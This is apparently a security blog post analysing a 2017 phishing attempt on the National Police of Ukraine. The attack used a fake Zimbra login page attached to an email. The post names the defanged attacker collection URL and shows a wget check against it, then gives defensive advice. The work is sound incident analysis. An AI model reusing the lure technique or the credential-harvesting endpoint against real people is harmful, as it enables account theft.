Wednesday, 15 February 2017

Targeted Attack on the National Police of Ukraine


According to the .eml file that was uploaded today to VirusTotal, unknowns tried to run a targeted attack on the National Police of Ukraine.

The email (MD5: bec01fe3b14b3da507a6a4c5c698e8ed) was sent to admin@police.gov.ua with the fake login page attached as an html file (MD5: 5dca48afe347db9e9f9cab9c824c122d) a week ago.


Let us take a closer look at the attackers' attempt to execute this targeted attack.

The sender’s mailbox is in the ‘kelantan.gov.my’ domain, which is the official web portal of the Kelantan state of Malaysia. The mailbox could be hacked or the sender’s information was spoofed by the attacker.


The message has the attachment named ‘Zimbra_Webmail_Activation.html’ and contains the fake Zimbra service login page inside.


“Zimbra provides open source server and client software for messaging and collaboration. To find out more visit http://www.zimbra.com.”















Once entered the login and password could have gone to hxxp://apliflex.pl/blue-zimbra.php.


The attackers supposedly hacked the poorly secured website before and placed the proxy script to forward the submitted login and password.



At the moment of writing this post, the script was removed already:
wget hxxp://apliflex.pl/blue-zimbra.php
Resolving apliflex.pl (apliflex.pl)... 46.242.145.98
Connecting to apliflex.pl (apliflex.pl)|46.242.145.98|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
We couldn't trace and attribute this attack to any party.

This example shows again that social engineering techniques can be utilized to take over the target in a more effective way than, for example, using expensive exploits that are mostly dependent on outdated software installed on a victim’s computer and can be easily blocked by antiviruses.

To resist this kind of targeted attacks, quarantine all email attachments that come from suspicious senders to analyze them later in the sandbox (e.g. http://nas.nioguard.com/). The attackers typically use the following extensions for attached files: html, js, wsf, doc, docx, pdf, png, jpg, scr, exe, com, zip, rar. Beware of unpacking and/or opening these type of documents received from unknown senders.

No comments:

Post a comment